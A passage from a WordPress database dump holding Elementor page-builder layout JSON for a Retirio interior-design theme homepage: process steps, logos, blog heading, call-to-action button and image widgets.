esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4012,4891,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4013,4891,'_elementor_pro_version','3.8.1'),(4014,4892,'_wp_page_template','elementor_header_footer'),(4015,4892,'_elementor_edit_mode','builder'),(4016,4892,'_elementor_template_type','wp-page'),(4017,4892,'_elementor_version','3.8.1'),(4018,4892,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_